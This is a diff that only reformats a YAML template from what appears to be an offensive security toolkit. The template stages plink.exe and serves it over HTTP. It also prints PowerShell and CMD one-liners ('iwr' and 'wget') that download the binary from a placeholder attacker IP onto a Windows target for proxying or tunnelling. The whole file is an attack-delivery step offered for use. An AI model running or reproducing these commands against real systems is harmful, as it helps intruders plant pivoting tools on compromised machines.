--- a/src/profi/templates/scripts/deliver-windows-plink.yaml
+++ b/src/profi/templates/scripts/deliver-windows-plink.yaml
@@ -1,17 +1,17 @@
+---
 metadata:
-  filename: deliver-windows-plink.yaml
-  tags:
-  - windows
-  - proxy
-  created: '2025-03-29'
-  author: Unknown
-content: "mkdir -p packstation/outbound; cp -n /usr/share/windows-resources/binaries/plink.exe\
-  \ packstation/outbound; \\\necho '================================================================';\
-  \ \\\necho '                      -----PowerShell-----                      '; \\\
-  \necho 'Deliver only: iwr -uri http://{{ attacker_ip }}:{{ delivery_outbound_port\
-  \ }}/plink.exe -Outfile {{ delivery_path_windows }}\\plink.exe'; \\\necho '================================================================';\
-  \ \\\necho '                         -----CMD-----                          '; \\\
-  \necho 'Deliver only: powershell wget -uri http://{{ attacker_ip }}:{{ delivery_outbound_port\
-  \ }}/plink.exe -Outfile {{ delivery_path_windows }}\\plink.exe'; \\\necho '================================================================';\
-  \ \\\n python {{ templates_dir }}/helper_scripts/startEnhancedHttpServer.py -p {{\
-  \ delivery_outbound_port }} -d packstation/outbound\n"
+  filename: "deliver-windows-plink.yaml"
+  tags: ["windows", "proxy"]
+  created: "2025-03-29"
+  author: "Unknown"
+
+content: |
+  mkdir -p packstation/outbound; cp -n /usr/share/windows-resources/binaries/plink.exe packstation/outbound; \
+  echo '================================================================'; \
+  echo '                      -----PowerShell-----                      '; \
+  echo 'Deliver only: iwr -uri http://{{ attacker_ip }}:{{ delivery_outbound_port }}/plink.exe -Outfile {{ delivery_path_windows }}\plink.exe'; \
+  echo '================================================================'; \
+  echo '                         -----CMD-----                          '; \
+  echo 'Deliver only: powershell wget -uri http://{{ attacker_ip }}:{{ delivery_outbound_port }}/plink.exe -Outfile {{ delivery_path_windows }}\plink.exe'; \
+  echo '================================================================'; \
+  python {{ templates_dir }}/helper_scripts/startEnhancedHttpServer.py -p {{ delivery_outbound_port }} -d packstation/outbound
